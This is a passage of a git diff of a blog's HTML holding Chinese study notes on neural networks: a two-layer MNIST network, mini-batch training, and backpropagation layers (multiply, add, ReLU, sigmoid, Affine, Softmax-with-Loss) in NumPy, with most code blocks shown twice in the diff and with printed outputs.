        W1, W2 = self.params['W1'], self.params['W2']
        b1, b2 = self.params['b1'], self.params['b2']
        a1 = np.dot(x, W1) + b1
        z1 = sigmoid(a1)
        a2 = np.dot(z1, W2) + b2
        y = softmax(a2)
        return y


        # x:输入数据, t:监督数据
        def loss(self, x, t):
        """
        损失函数:交叉熵损失函数
        """
        y = self.predict(x)

        return cross_entropy_error(y, t)


        def accuracy(self, x, t):
        """
        计算识别精度
        """
        y = self.predict(x)
        y = np.argmax(y, axis=1)
        t = np.argmax(t, axis=1)
        accuracy = np.sum(y == t) / float(x.shape[0])
        return accuracy


        # x:输入数据, t:监督数据
        def numerical_gradient(self, x, t):
        """
        计算权重参数的梯度(数值微分法)
        grads 保存梯度的字典型变量(numerical_gradient()方法的返回值)。
        """
        loss_W = lambda W: self.loss(x, t)
        grads = {}
        grads['W1'] = numerical_gradient(loss_W, self.params['W1'])
        grads['b1'] = numerical_gradient(loss_W, self.params['b1'])
        grads['W2'] = numerical_gradient(loss_W, self.params['W2'])
        grads['b2'] = numerical_gradient(loss_W, self.params['b2'])
        return grads


        def gradient(self, x, t):
        """
        计算权重参数的梯度(反向传播法)
        grads 保存梯度的字典型变量(numerical_gradient()方法的返回值)。
        """
        W1, W2 = self.params['W1'], self.params['W2']
        b1, b2 = self.params['b1'], self.params['b2']
        grads = {}

        batch_num = x.shape[0]

        # forward
        a1 = np.dot(x, W1) + b1
        z1 = sigmoid(a1)
        a2 = np.dot(z1, W2) + b2
        y = softmax(a2)

        # backward
        dy = (y - t) / batch_num
        grads['W2'] = np.dot(z1.T, dy)
        grads['b2'] = np.sum(dy, axis=0)

        da1 = np.dot(dy, W2.T)
        dz1 = sigmoid_grad(a1) * da1
        grads['W1'] = np.dot(x.T, dz1)
        grads['b1'] = np.sum(dz1, axis=0)

        return grads
        -
        net = TwoLayerNet(input_size=784, hidden_size=100, output_size=10)
        print(net.params['W1'].shape) # (784, 100)
        print(net.params['b1'].shape) # (100,)
        print(net.params['W2'].shape) # (100, 10)
        print(net.params['b2'].shape) # (10,)
        +
        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        18
        19
        20
        21
        22
        23
        24
        25
        26
        27
        28
        29
        30
        31
        32
        33
        34
        35
        36
        37
        38
        39
        40
        41
        42
        43
        44
        45
        46
        47
        48
        49
        50
        51
        52
        53
        54
        55
        56
        57
        58
        59
        60
        61
        62
        63
        64
        65
        66
        67
        68
        69
        70
        71
        72
        73
        74
        75
        76
        77
        78
        79
        80
        81
        82
        83
        84
        85
        86
        87
        88
        89
        90
        91
        92
        93
        94
        95
        96
        97
        98
        99
        100
        import sys, os
        sys.path.append(os.pardir)
        from common.functions import *
        from common.gradient import numerical_gradient

        class TwoLayerNet:


        def __init__(self, input_size, hidden_size, output_size, weight_init_std=0.01):
        """
        初始化权重
        params 保存神经网络的参数的字典型变量(实例变量)。
        input_size: 输入层的神经元数
        hidden_size: 隐藏层的神经元数
        output_size: 输出层的神经元数
        """
        self.params = {}
        self.params['W1'] = weight_init_std * np.random.randn(input_size, hidden_size)
        self.params['b1'] = np.zeros(hidden_size)
        self.params['W2'] = weight_init_std * np.random.randn(hidden_size, output_size)
        self.params['b2'] = np.zeros(output_size)


        def predict(self, x):
        """
        进行推理,x 是图像数据
        """
        W1, W2 = self.params['W1'], self.params['W2']
        b1, b2 = self.params['b1'], self.params['b2']
        a1 = np.dot(x, W1) + b1
        z1 = sigmoid(a1)
        a2 = np.dot(z1, W2) + b2
        y = softmax(a2)
        return y


        # x:输入数据, t:监督数据
        def loss(self, x, t):
        """
        损失函数:交叉熵损失函数
        """
        y = self.predict(x)

        return cross_entropy_error(y, t)


        def accuracy(self, x, t):
        """
        计算识别精度
        """
        y = self.predict(x)
        y = np.argmax(y, axis=1)
        t = np.argmax(t, axis=1)
        accuracy = np.sum(y == t) / float(x.shape[0])
        return accuracy


        # x:输入数据, t:监督数据
        def numerical_gradient(self, x, t):
        """
        计算权重参数的梯度(数值微分法)
        grads 保存梯度的字典型变量(numerical_gradient()方法的返回值)。
        """
        loss_W = lambda W: self.loss(x, t)
        grads = {}
        grads['W1'] = numerical_gradient(loss_W, self.params['W1'])
        grads['b1'] = numerical_gradient(loss_W, self.params['b1'])
        grads['W2'] = numerical_gradient(loss_W, self.params['W2'])
        grads['b2'] = numerical_gradient(loss_W, self.params['b2'])
        return grads


        def gradient(self, x, t):
        """
        计算权重参数的梯度(反向传播法)
        grads 保存梯度的字典型变量(numerical_gradient()方法的返回值)。
        """
        W1, W2 = self.params['W1'], self.params['W2']
        b1, b2 = self.params['b1'], self.params['b2']
        grads = {}

        batch_num = x.shape[0]

        # forward
        a1 = np.dot(x, W1) + b1
        z1 = sigmoid(a1)
        a2 = np.dot(z1, W2) + b2
        y = softmax(a2)

        # backward
        dy = (y - t) / batch_num
        grads['W2'] = np.dot(z1.T, dy)
        grads['b2'] = np.sum(dy, axis=0)

        da1 = np.dot(dy, W2.T)
        dz1 = sigmoid_grad(a1) * da1
        grads['W1'] = np.dot(x.T, dz1)
        grads['b1'] = np.sum(dz1, axis=0)

        return grads
        +
        1
        2
        3
        4
        5
        net = TwoLayerNet(input_size=784, hidden_size=100, output_size=10)
        print(net.params['W1'].shape) # (784, 100)
        print(net.params['b1'].shape) # (100,)
        print(net.params['W2'].shape) # (100, 10)
        print(net.params['b2'].shape) # (10,)
        (784, 100)
         (100,)
         (100, 10)
         (10,)
         

        4.5.2mini-batch 的实现

        -
        import sys, os
        sys.path.append(os.pardir) # 为了导入父目录的文件而进行的设定
        import numpy as np
        import matplotlib.pyplot as plt
        from dataset.mnist import load_mnist

        # 读入数据
        (x_train, t_train), (x_test, t_test) = load_mnist(normalize=True, one_hot_label=True)

        network = TwoLayerNet(input_size=784, hidden_size=50, output_size=10)

        iters_num = 10000 # 适当设定循环的次数
        train_size = x_train.shape[0]
        batch_size = 100 # mini-batch 大小
        learning_rate = 0.1 # 学习率

        train_loss_list = []
        train_acc_list = []
        # 平均每个 epoch 的重复次数
        test_acc_list = []

        iter_per_epoch = max(train_size / batch_size, 1)

        for i in range(iters_num):
        batch_mask = np.random.choice(train_size, batch_size)
        x_batch = x_train[batch_mask]
        t_batch = t_train[batch_mask]

        # 计算梯度
        # grad = network.numerical_gradient(x_batch, t_batch) 数值微分
        grad = network.gradient(x_batch, t_batch) # 高速版!反向传播

        # 更新参数
        for key in ('W1', 'b1', 'W2', 'b2'):
        network.params[key] -= learning_rate * grad[key]

        loss = network.loss(x_batch, t_batch)
        train_loss_list.append(loss)

        if i % iter_per_epoch == 0:
        # 计算每个 epoch 的识别精度
        train_acc = network.accuracy(x_train, t_train)
        test_acc = network.accuracy(x_test, t_test)
        train_acc_list.append(train_acc)
        test_acc_list.append(test_acc)
        print("train acc, test acc | " + str(train_acc) + ", " + str(test_acc))

        # 绘制图形
        markers = {'train': 'o', 'test': 's'}
        x = np.arange(len(train_acc_list))
        plt.plot(x, train_acc_list, label='train acc')
        plt.plot(x, test_acc_list, label='test acc', linestyle='--')
        plt.xlabel("epochs")
        plt.ylabel("accuracy")
        plt.ylim(0, 1.0)
        plt.legend(loc='lower right')
        plt.show()
        +
        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        18
        19
        20
        21
        22
        23
        24
        25
        26
        27
        28
        29
        30
        31
        32
        33
        34
        35
        36
        37
        38
        39
        40
        41
        42
        43
        44
        45
        46
        47
        48
        49
        50
        51
        52
        53
        54
        55
        56
        57
        import sys, os
        sys.path.append(os.pardir) # 为了导入父目录的文件而进行的设定
        import numpy as np
        import matplotlib.pyplot as plt
        from dataset.mnist import load_mnist

        # 读入数据
        (x_train, t_train), (x_test, t_test) = load_mnist(normalize=True, one_hot_label=True)

        network = TwoLayerNet(input_size=784, hidden_size=50, output_size=10)

        iters_num = 10000 # 适当设定循环的次数
        train_size = x_train.shape[0]
        batch_size = 100 # mini-batch 大小
        learning_rate = 0.1 # 学习率

        train_loss_list = []
        train_acc_list = []
        # 平均每个 epoch 的重复次数
        test_acc_list = []

        iter_per_epoch = max(train_size / batch_size, 1)

        for i in range(iters_num):
        batch_mask = np.random.choice(train_size, batch_size)
        x_batch = x_train[batch_mask]
        t_batch = t_train[batch_mask]

        # 计算梯度
        # grad = network.numerical_gradient(x_batch, t_batch) 数值微分
        grad = network.gradient(x_batch, t_batch) # 高速版!反向传播

        # 更新参数
        for key in ('W1', 'b1', 'W2', 'b2'):
        network.params[key] -= learning_rate * grad[key]

        loss = network.loss(x_batch, t_batch)
        train_loss_list.append(loss)

        if i % iter_per_epoch == 0:
        # 计算每个 epoch 的识别精度
        train_acc = network.accuracy(x_train, t_train)
        test_acc = network.accuracy(x_test, t_test)
        train_acc_list.append(train_acc)
        test_acc_list.append(test_acc)
        print("train acc, test acc | " + str(train_acc) + ", " + str(test_acc))

        # 绘制图形
        markers = {'train': 'o', 'test': 's'}
        x = np.arange(len(train_acc_list))
        plt.plot(x, train_acc_list, label='train acc')
        plt.plot(x, test_acc_list, label='test acc', linestyle='--')
        plt.xlabel("epochs")
        plt.ylabel("accuracy")
        plt.ylim(0, 1.0)
        plt.legend(loc='lower right')
        plt.show()
        train acc, test acc | 0.09863333333333334, 0.0958
         train acc, test acc | 0.7874166666666667, 0.7928
         train acc, test acc | 0.8762, 0.879
        @@ -4602,6 +4600,8 @@ 

        目录

        var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/DL-\346\267\261\345\272\246\345\255\246\344\271\240\345\205\245\351\227\250-\345\237\272\344\272\216Python\347\232\204\347\220\206\350\256\272\344\270\216\345\256\236\347\216\260-5-\350\257\257\345\267\256\345\217\215\345\220\221\344\274\240\346\222\255\346\263\225/index.html" "b/posts/DL-\346\267\261\345\272\246\345\255\246\344\271\240\345\205\245\351\227\250-\345\237\272\344\272\216Python\347\232\204\347\220\206\350\256\272\344\270\216\345\256\236\347\216\260-5-\350\257\257\345\267\256\345\217\215\345\220\221\344\274\240\346\222\255\346\263\225/index.html" index f5f9956770..7127dec2f3 100644 --- "a/posts/DL-\346\267\261\345\272\246\345\255\246\344\271\240\345\205\245\351\227\250-\345\237\272\344\272\216Python\347\232\204\347\220\206\350\256\272\344\270\216\345\256\236\347\216\260-5-\350\257\257\345\267\256\345\217\215\345\220\221\344\274\240\346\222\255\346\263\225/index.html" +++ "b/posts/DL-\346\267\261\345\272\246\345\255\246\344\271\240\345\205\245\351\227\250-\345\237\272\344\272\216Python\347\232\204\347\220\206\350\256\272\344\270\216\345\256\236\347\216\260-5-\350\257\257\345\267\256\345\217\215\345\220\221\344\274\240\346\222\255\346\263\225/index.html" @@ -44,8 +44,6 @@ - - @@ -454,18 +452,18 @@

        5.4.1 乘法层的实现

        层的实现中有两个共通的方法(接口)forward()backward()forward()对应正向传播,backward()对应反向传播。

        考虑 $z=xy$,则 $\frac{\partial z}{\partial x}=y, \frac{\partial z}{\partial y}=x$

        -
        class MulLayer:
        def __init__(self):
        """
        定义 x 和 y(保存正向传播的输入信号)
        """
        self.x = None
        self.y = None


        def forward(self, x, y):
        self.x = x
        self.y = y
        out = x * y

        return out


        def backward(self, dout):
        dx = dout * self.y # 翻转 x 和 y
        dy = dout * self.x
        return dx, dy
        -
        apple = 100
        apple_num = 2
        tax = 1.1

        # layer
        mul_apple_layer = MulLayer()
        mul_tax_layer = MulLayer()

        # forward
        apple_price = mul_apple_layer.forward(apple, apple_num) # 苹果总价
        price = mul_tax_layer.forward(apple_price, tax) # 加上税收总价
        print(price) # 220
        +
        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        18
        19
        20
        21
        class MulLayer:
        def __init__(self):
        """
        定义 x 和 y(保存正向传播的输入信号)
        """
        self.x = None
        self.y = None


        def forward(self, x, y):
        self.x = x
        self.y = y
        out = x * y

        return out


        def backward(self, dout):
        dx = dout * self.y # 翻转 x 和 y
        dy = dout * self.x
        return dx, dy
        +
        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        apple = 100
        apple_num = 2
        tax = 1.1

        # layer
        mul_apple_layer = MulLayer()
        mul_tax_layer = MulLayer()

        # forward
        apple_price = mul_apple_layer.forward(apple, apple_num) # 苹果总价
        price = mul_tax_layer.forward(apple_price, tax) # 加上税收总价
        print(price) # 220
        220.00000000000003
         

        此外,关于各个变量的导数可由backward()求出。

        -
        # backward
        dprice = 1
        dapple_price, dtax = mul_tax_layer.backward(dprice)
        dapple, dapple_num = mul_apple_layer.backward(dapple_price)
        print(dapple, dapple_num, dtax) # 2.2 110 200
        +
        1
        2
        3
        4
        5
        # backward
        dprice = 1
        dapple_price, dtax = mul_tax_layer.backward(dprice)
        dapple, dapple_num = mul_apple_layer.backward(dapple_price)
        print(dapple, dapple_num, dtax) # 2.2 110 200
        2.2 110.00000000000001 200
         

        5.4.2 加法层的实现

        -
        class AddLayer:
        def __init__(self):
        """
        加法层不需要特意进行初始化,所以__init__()中什么也不运行
        """
        pass


        def forward(self, x, y):
        out = x + y
        return out


        def backward(self, dout):
        dx = dout * 1
        dy = dout * 1
        return dx, dy
        +
        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        class AddLayer:
        def __init__(self):
        """
        加法层不需要特意进行初始化,所以__init__()中什么也不运行
        """
        pass


        def forward(self, x, y):
        out = x + y
        return out


        def backward(self, dout):
        dx = dout * 1
        dy = dout * 1
        return dx, dy

        使用加法层和乘法层,实现上图所示的购买 2 个苹果和 3 个橘子。

        -
        apple = 100
        apple_num = 2
        orange = 150
        orange_num = 3
        tax = 1.1

        # layer 生成必要的层
        mul_apple_layer = MulLayer()
        mul_orange_layer = MulLayer()
        add_apple_orange_layer = AddLayer()
        mul_tax_layer = MulLayer()

        # forward 合适的顺序调用正向传播的 forward() 方法
        apple_price = mul_apple_layer.forward(apple, apple_num) #(1)
        orange_price = mul_orange_layer.forward(orange, orange_num) #(2)
        all_price = add_apple_orange_layer.forward(apple_price, orange_price) #(3)
        price = mul_tax_layer.forward(all_price, tax) #(4)

        # backward 与正向传播相反的顺序调用反向传播的 backward() 方法
        dprice = 1
        dall_price, dtax = mul_tax_layer.backward(dprice) #(4)
        dapple_price, dorange_price = add_apple_orange_layer.backward(dall_price) #(3)
        dorange, dorange_num = mul_orange_layer.backward(dorange_price) #(2)
        dapple, dapple_num = mul_apple_layer.backward(dapple_price) #(1)

        print(price) # 715
        print(dapple_num, dapple, dorange, dorange_num, dtax) # 110 2.2 3.3 165 650
        +
        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        18
        19
        20
        21
        22
        23
        24
        25
        26
        27
        apple = 100
        apple_num = 2
        orange = 150
        orange_num = 3
        tax = 1.1

        # layer 生成必要的层
        mul_apple_layer = MulLayer()
        mul_orange_layer = MulLayer()
        add_apple_orange_layer = AddLayer()
        mul_tax_layer = MulLayer()

        # forward 合适的顺序调用正向传播的 forward() 方法
        apple_price = mul_apple_layer.forward(apple, apple_num) #(1)
        orange_price = mul_orange_layer.forward(orange, orange_num) #(2)
        all_price = add_apple_orange_layer.forward(apple_price, orange_price) #(3)
        price = mul_tax_layer.forward(all_price, tax) #(4)

        # backward 与正向传播相反的顺序调用反向传播的 backward() 方法
        dprice = 1
        dall_price, dtax = mul_tax_layer.backward(dprice) #(4)
        dapple_price, dorange_price = add_apple_orange_layer.backward(dall_price) #(3)
        dorange, dorange_num = mul_orange_layer.backward(dorange_price) #(2)
        dapple, dapple_num = mul_apple_layer.backward(dapple_price) #(1)

        print(price) # 715
        print(dapple_num, dapple, dorange, dorange_num, dtax) # 110 2.2 3.3 165 650
        715.0000000000001
         110.00000000000001 2.2 3.3000000000000003 165.0 650
         
        @@ -475,7 +473,7 @@

        5.5.1 ReLU 层$$y=\left{\begin{matrix}x\quad (x>0)\0\quad(x\le0)\end{matrix}\right.$$

        $$\frac{\partial y}{\partial x}=\left{\begin{matrix}1\quad (x>0)\0\quad(x\le0)\end{matrix}\right.$$

        -
        class Relu:
        def __init__(self):
        self.mask = None


        def forward(self, x):
        """
        mask 是由 True/False 构成的 NumPy 数组,
        它会把正向传播时的输入 x 的元素中小于等于 0 的地方保存为 True,
        其他地方(大于 0 的元素)保存为 False
        """
        self.mask = (x <= 0)
        out = x.copy()
        out[self.mask] = 0

        return out


        def backward(self, dout):
        """
        如果正向传播时的输入值小于等于 0,则反向传播的值为 0
        反向传播中会使用正向传播时保存的 mask,
        将从上游传来的 dout 的 mask 中的元素为 True 的地方设为 0
        """
        dout[self.mask] = 0
        dx = dout

        return dx
        +
        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        18
        19
        20
        21
        22
        23
        24
        25
        26
        27
        28
        class Relu:
        def __init__(self):
        self.mask = None


        def forward(self, x):
        """
        mask 是由 True/False 构成的 NumPy 数组,
        它会把正向传播时的输入 x 的元素中小于等于 0 的地方保存为 True,
        其他地方(大于 0 的元素)保存为 False
        """
        self.mask = (x <= 0)
        out = x.copy()
        out[self.mask] = 0

        return out


        def backward(self, dout):
        """
        如果正向传播时的输入值小于等于 0,则反向传播的值为 0
        反向传播中会使用正向传播时保存的 mask,
        将从上游传来的 dout 的 mask 中的元素为 True 的地方设为 0
        """
        dout[self.mask] = 0
        dx = dout

        return dx

        5.5.2 Sigmoid 层

        $$
        \begin{eqnarray}
        @@ -486,7 +484,7 @@

        5.5.2 Sigm &= y(1-y)
        \end{eqnarray}
        $$

        -
        class Sigmoid:
        def __init__(self):
        self.out = None


        def forward(self, x):
        """
        正向传播时将输出保存在了实例变量 out 中
        """
        out = 1 / (1 + np.exp(-x))
        self.out = out

        return out


        def backward(self, dout):
        """
        反向传播时,使用该变量 out 进行计算
        """
        dx = dout * (1.0 - self.out) * self.out

        return dx
        +
        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        18
        19
        20
        21
        22
        class Sigmoid:
        def __init__(self):
        self.out = None


        def forward(self, x):
        """
        正向传播时将输出保存在了实例变量 out 中
        """
        out = 1 / (1 + np.exp(-x))
        self.out = out

        return out


        def backward(self, dout):
        """
        反向传播时,使用该变量 out 进行计算
        """
        dx = dout * (1.0 - self.out) * self.out

        return dx

        5.6 Affine/Softmax 层的实现

        5.6.1 Affine 层

        @@ -509,9 +507,9 @@

        class Affine:
        def __init__(self, W, b):
        self.W = W
        self.b = b
        self.x = None
        self.dW = None
        self.db = None


        def forward(self, x):
        self.x = x
        out = np.dot(x, self.W) + self.b

        return out


        def backward(self, dout):
        dx = np.dot(dout, self.W.T) # (1)
        self.dW = np.dot(self.x.T, dout) # (2)
        self.db = np.sum(dout, axis=0) # (3)

        return dx
        +
        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        18
        19
        20
        21
        22
        class Affine:
        def __init__(self, W, b):
        self.W = W
        self.b = b
        self.x = None
        self.dW = None
        self.db = None


        def forward(self, x):
        self.x = x
        out = np.dot(x, self.W) + self.b

        return out


        def backward(self, dout):
        dx = np.dot(dout, self.W.T) # (1)
        self.dW = np.dot(self.x.T, dout) # (2)
        self.db = np.sum(dout, axis=0) # (3)

        return dx

        5.6.3 Softmax-with-Loss 层

        -
        class SoftmaxWithLoss:
        def __init__(self):
        self.loss = None # 损失
        self.y = None # softmax 的输出
        self.t = None # 监督数据(one-hot vector)


        def forward(self, x, t):
        self.t = t
        self.y = softmax(x)
        self.loss = cross_entropy_error(self.y, self.t)

        return self.loss


        def backward(self, dout=1):
        batch_size = self.t.shape[0]
        dx = (self.y - self.t) / batch_size

        return dx
        +
        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        18
        19
        20
        class SoftmaxWithLoss:
        def __init__(self):
        self.loss = None # 损失
        self.y = None # softmax 的输出
        self.t = None # 监督数据(one-hot vector)


        def forward(self, x, t):
        self.t = t
        self.y = softmax(x)
        self.loss = cross_entropy_error(self.y, self.t)

        return self.loss


        def backward(self, dout=1):
        batch_size = self.t.shape[0]
        dx = (self.y - self.t) / batch_size

        return dx

        5.7 误差反向传播法的实现

        5.7.1 神经网络学习的全貌图

        前提

        @@ -525,7 +523,7 @@

        5.7.2 对应误差反向传播法的神经网络的实现

        -
        import sys, os
        sys.path.append(os.pardir)
        import numpy as np
        from common.layers import *
        from common.gradient import numerical_gradient
        from collections import OrderedDict


        class TwoLayerNet:

        def __init__(self, input_size, hidden_size, output_size, weight_init_std=0.01):
        """
        进行初始化:
        input_size: 输入层的神经元数
        hidden_size: 隐藏层的神经元数
        output_size: 输出层的神经元数
        weight_init_std: 初始化权重时的高斯分布的规模
        """
        # 初始化权重
        self.params = {}
        self.params['W1'] = weight_init_std * np.random.randn(input_size, hidden_size)
        self.params['b1'] = np.zeros(hidden_size)
        self.params['W2'] = weight_init_std * np.random.randn(hidden_size, output_size)
        self.params['b2'] = np.zeros(output_size)
        # 生成层
        self.layers = OrderedDict()
        self.layers['Affine1'] = Affine(self.params['W1'], self.params['b1'])
        self.layers['Relu1'] = Relu()
        self.layers['Affine2'] = Affine(self.params['W2'], self.params['b2'])
        self.lastLayer = SoftmaxWithLoss()


        def predict(self, x):
        """
        进行识别(推理)
        x: 是图像数据
        """
        for layer in self.layers.values():
        x = layer.forward(x)
        return x


        def loss(self, x, t):
        """
        计算损失函数的值
        x: 输入数据
        t: 监督数据
        """
        y = self.predict(x)
        return self.lastLayer.forward(y, t)


        def accuracy(self, x, t):
        """
        计算识别精度
        """
        y = self.predict(x)
        y = np.argmax(y, axis=1)
        if t.ndim != 1:
        t = np.argmax(t, axis=1)
        accuracy = np.sum(y == t) / float(x.shape[0])
        return accuracy


        def numerical_gradient(self, x, t):
        """
        通过数值微分计算关于权重参数的梯度
        """
        loss_W = lambda W: self.loss(x, t)
        grads = {}
        grads['W1'] = numerical_gradient(loss_W, self.params['W1'])
        grads['b1'] = numerical_gradient(loss_W, self.params['b1'])
        grads['W2'] = numerical_gradient(loss_W, self.params['W2'])
        grads['b2'] = numerical_gradient(loss_W, self.params['b2'])
        return grads


        def gradient(self, x, t):
        """
        通过误差反向传播法计算关于权重参数的梯度
        """
        # forward
        self.loss(x, t)
        # backward
        dout = 1
        dout = self.lastLayer.backward(dout)
        layers = list(self.layers.values())
        layers.reverse()
        for layer in layers:
        dout = layer.backward(dout)
        # 设定
        grads = {}
        grads['W1'] = self.layers['Affine1'].dW
        grads['b1'] = self.layers['Affine1'].db
        grads['W2'] = self.layers['Affine2'].dW
        grads['b2'] = self.layers['Affine2'].db
        return grads
        +
        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        18
        19
        20
        21
        22
        23
        24
        25
        26
        27
        28
        29
        30
        31
        32
        33
        34
        35
        36
        37
        38
        39
        40
        41
        42
        43
        44
        45
        46
        47
        48
        49
        50
        51
        52
        53
        54
        55
        56
        57
        58
        59
        60
        61
        62
        63
        64
        65
        66
        67
        68
        69
        70
        71
        72
        73
        74
        75
        76
        77
        78
        79
        80
        81
        82
        83
        84
        85
        86
        87
        88
        89
        90
        91
        92
        93
        94
        95
        96
        97
        import sys, os
        sys.path.append(os.pardir)
        import numpy as np
        from common.layers import *
        from common.gradient import numerical_gradient
        from collections import OrderedDict


        class TwoLayerNet:

        def __init__(self, input_size, hidden_size, output_size, weight_init_std=0.01):
        """
        进行初始化:
        input_size: 输入层的神经元数
        hidden_size: 隐藏层的神经元数
        output_size: 输出层的神经元数
        weight_init_std: 初始化权重时的高斯分布的规模
        """
        # 初始化权重
        self.params = {}
        self.params['W1'] = weight_init_std * np.random.randn(input_size, hidden_size)
        self.params['b1'] = np.zeros(hidden_size)
        self.params['W2'] = weight_init_std * np.random.randn(hidden_size, output_size)
        self.params['b2'] = np.zeros(output_size)
        # 生成层
        self.layers = OrderedDict()
        self.layers['Affine1'] = Affine(self.params['W1'], self.params['b1'])
        self.layers['Relu1'] = Relu()
        self.layers['Affine2'] = Affine(self.params['W2'], self.params['b2'])
        self.lastLayer = SoftmaxWithLoss()


        def predict(self, x):
        """
        进行识别(推理)
        x: 是图像数据
        """
        for layer in self.layers.values():
        x = layer.forward(x)
        return x


        def loss(self, x, t):
        """
        计算损失函数的值
        x: 输入数据
        t: 监督数据
        """
        y = self.predict(x)
        return self.lastLayer.forward(y, t)


        def accuracy(self, x, t):
        """
        计算识别精度
        """
        y = self.predict(x)
        y = np.argmax(y, axis=1)
        if t.ndim != 1:
        t = np.argmax(t, axis=1)
        accuracy = np.sum(y == t) / float(x.shape[0])
        return accuracy


        def numerical_gradient(self, x, t):
        """
        通过数值微分计算关于权重参数的梯度
        """
        loss_W = lambda W: self.loss(x, t)
        grads = {}
        grads['W1'] = numerical_gradient(loss_W, self.params['W1'])
        grads['b1'] = numerical_gradient(loss_W, self.params['b1'])
        grads['W2'] = numerical_gradient(loss_W, self.params['W2'])
        grads['b2'] = numerical_gradient(loss_W, self.params['b2'])
        return grads


        def gradient(self, x, t):
        """
        通过误差反向传播法计算关于权重参数的梯度
        """
        # forward
        self.loss(x, t)
        # backward
        dout = 1
        dout = self.lastLayer.backward(dout)
        layers = list(self.layers.values())
        layers.reverse()
        for layer in layers:
        dout = layer.backward(dout)
        # 设定
        grads = {}
        grads['W1'] = self.layers['Affine1'].dW
        grads['b1'] = self.layers['Affine1'].db
        grads['W2'] = self.layers['Affine2'].dW
        grads['b2'] = self.layers['Affine2'].db
        return grads

        5.7.3 误差反向传播法的梯度确认

        两种求梯度的方法:

          @@ -537,7 +535,7 @@

          import sys, os
          sys.path.append(os.pardir)
          import numpy as np
          from dataset.mnist import load_mnist

          # 读入数据
          (x_train, t_train), (x_test, t_test) = load_mnist(normalize=True, one_hot_label = True)
          network = TwoLayerNet(input_size=784, hidden_size=50, output_size=10)
          x_batch = x_train[:3]
          t_batch = t_train[:3]
          grad_numerical = network.numerical_gradient(x_batch, t_batch)
          grad_backprop = network.gradient(x_batch, t_batch)
          # 求各个权重的绝对误差的平均值
          for key in grad_numerical.keys():
          diff = np.average( np.abs(grad_backprop[key] - grad_numerical[key]) )
          print(key + ":" + str(diff))
          +
          1
          2
          3
          4
          5
          6
          7
          8
          9
          10
          11
          12
          13
          14
          15
          16
          import sys, os
          sys.path.append(os.pardir)
          import numpy as np
          from dataset.mnist import load_mnist

          # 读入数据
          (x_train, t_train), (x_test, t_test) = load_mnist(normalize=True, one_hot_label = True)
          network = TwoLayerNet(input_size=784, hidden_size=50, output_size=10)
          x_batch = x_train[:3]
          t_batch = t_train[:3]
          grad_numerical = network.numerical_gradient(x_batch, t_batch)
          grad_backprop = network.gradient(x_batch, t_batch)
          # 求各个权重的绝对误差的平均值
          for key in grad_numerical.keys():
          diff = np.average( np.abs(grad_backprop[key] - grad_numerical[key]) )
          print(key + ":" + str(diff))
          W1:5.098230563374566e-10
           b1:3.2030157216551143e-09
           W2:5.229628806065797e-09
          @@ -545,7 +543,7 @@ 

          5.7.4 使用误差反向传播法的学习

          -
          import sys, os
          sys.path.append(os.pardir)
          import numpy as np
          from dataset.mnist import load_mnist

          # 读入数据
          (x_train, t_train), (x_test, t_test) = load_mnist(normalize=True, one_hot_label=True)
          network = TwoLayerNet(input_size=784, hidden_size=50, output_size=10)

          iters_num = 10000
          train_size = x_train.shape[0]
          batch_size = 100
          learning_rate = 0.1
          train_loss_list = []
          train_acc_list = []
          test_acc_list = []

          iter_per_epoch = max(train_size / batch_size, 1)

          for i in range(iters_num):
          batch_mask = np.random.choice(train_size, batch_size)
          x_batch = x_train[batch_mask]
          t_batch = t_train[batch_mask]
          # 通过误差反向传播法求梯度
          grad = network.gradient(x_batch, t_batch)
          # 更新
          for key in ('W1', 'b1', 'W2', 'b2'):
          network.params[key] -= learning_rate * grad[key]

          loss = network.loss(x_batch, t_batch)
          train_loss_list.append(loss)
          if i % iter_per_epoch == 0:
          train_acc = network.accuracy(x_train, t_train)
          test_acc = network.accuracy(x_test, t_test)
          train_acc_list.append(train_acc)
          test_acc_list.append(test_acc)
          print(train_acc, test_acc)
          +
          1
          2
          3
          4
          5
          6
          7
          8
          9
          10
          11
          12
          13
          14
          15
          16
          17
          18
          19
          20
          21
          22
          23
          24
          25
          26
          27
          28
          29
          30
          31
          32
          33
          34
          35
          36
          37
          import sys, os
          sys.path.append(os.pardir)
          import numpy as np
          from dataset.mnist import load_mnist

          # 读入数据
          (x_train, t_train), (x_test, t_test) = load_mnist(normalize=True, one_hot_label=True)
          network = TwoLayerNet(input_size=784, hidden_size=50, output_size=10)

          iters_num = 10000
          train_size = x_train.shape[0]
          batch_size = 100
          learning_rate = 0.1
          train_loss_list = []
          train_acc_list = []
          test_acc_list = []

          iter_per_epoch = max(train_size / batch_size, 1)

          for i in range(iters_num):
          batch_mask = np.random.choice(train_size, batch_size)
          x_batch = x_train[batch_mask]
          t_batch = t_train[batch_mask]
          # 通过误差反向传播法求梯度
          grad = network.gradient(x_batch, t_batch)
          # 更新
          for key in ('W1', 'b1', 'W2', 'b2'):
          network.params[key] -= learning_rate * grad[key]

          loss = network.loss(x_batch, t_batch)
          train_loss_list.append(loss)
          if i % iter_per_epoch == 0:
          train_acc = network.accuracy(x_train, t_train)
          test_acc = network.accuracy(x_test, t_test)
          train_acc_list.append(train_acc)
          test_acc_list.append(test_acc)
          print(train_acc, test_acc)
          0.1278 0.1323
           0.9025833333333333 0.9064
           0.9237166666666666 0.925
          @@ -4514,6 +4512,8 @@ 

          目录

